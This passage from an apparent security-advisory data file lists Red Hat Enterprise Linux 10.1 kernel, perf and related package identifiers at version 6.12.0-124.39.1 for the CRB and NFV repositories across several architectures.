"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
